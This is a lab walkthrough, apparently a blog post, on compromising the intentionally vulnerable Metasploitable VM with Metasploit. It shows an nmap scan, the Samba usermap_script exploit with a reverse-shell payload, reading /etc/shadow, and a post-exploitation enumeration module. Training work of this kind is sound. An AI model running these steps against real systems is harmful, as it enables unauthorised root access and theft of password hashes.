Metasploitable + Backtrack = Fun

In this post I will be demonstrating how to use the basic functionality of Metasploit to compromise a linux host. The victim is a virtual machine called Metasploitable running linux, that is purposely packed with a bunch of vulnerable software. It is built to help people learn security so please do not download this and use it on any public facing network. You will get owned. You can download this VM here : Metasploitable

Once you have the VM downloaded fire it up and log into backtrack 5 as well.

Open a terminal in backtrack and make sure that you have the latest version of Metasploit installed using the msfupdate command.

First we will want to locate the vulnerable machine. I use netdiscover to list all the machines on the private network. I saw one running as a virtual machine so I will go ahead and assume that this is the Metasploitable VM.

Next we will go ahead and run a basic nmap scan on our victim machine. There are ways to scan machines inside of metasploit using the db_nmap command, among other things, but for the sake of simplicity lets just use regular nmap for now.

nmap -v -sV 192.168.2.109

This is a basic scan with the verbose flag so that we can see open ports as they are discovered followed by the service/version detection flag so that nmap will probe the open ports to discover services running and their versions.

As you can see there are many open ports on this machine. For the time being we will focus on the part of the scan that reads

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

TCP port 139 and 445 are open and are running samba smbd version 3.X. Lets see if metasploit has any exploits we can use that target this service.

There are two ways to search through the metasploit database.

Open up msfconsole and type: search samba
Go to http://www.metasploit.com/modules/ and search from there.

I choose to use the msfconsole and here are the results

The exploit that is of particular interest to us is exploit/multi/samba/usermap_script

Here is the description as to how this exploit works:

"This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!"

Obviously this is a very powerful exploit. Now we will want to configure the exploit before we send it to our target. First we will need to type:

use exploit/multi/samba/usermap_script

Once we have the exploit set we can also type:

info
show options

show options is pretty self explanatory in that it presents you with that particular exploit's configurable options. For this exploit we will only need to set a few of these options. First we will need to set the RHOST option. This is the ip that your victim is currently using. To do this type:

set RHOST <victim ip address>

The next option we need to set is the type of payload that this exploit will contain. I chose the generic/shell_reverse_tcp payload:

set PAYLOAD generic/shell_reverse_tcp

You can also specify the LPORT option, being the local port the shell will connect to. Once we double check that all of our options are configured correctly, we are ready to launch the exploit.

exploit

As you can see, the exploit completed successfully giving us back a shell on the compromised linux system. A simple ls command shows the linux filesystem that we are now able to browse at will and a whoami command shows that we have root privileges on the remote system. Lets go ahead and dump the passwords for all the users:

cat /etc/shadow

Since we know this is a linux box, lets just go ahead and gather as much information as we can using more features in metasploit. Hit control+z to background the current session. We will now use a post exploitation module that takes the session number as its only option and grabs and stores alot of information from our current environment.
type:

use linux/gather/enum_linux
set session
exploit

Here we can see that metasploit gathered alot of valuable information for us about this system and has stored it on our local disk.

Metasploit is a extremely powerful too and this is just one way that the metasploitable virtual machine can be compromised. Hopefully this will show you how dangerous running old versions of software can be. I will go through other ways to compromise metaploitable in later posts.

Jakx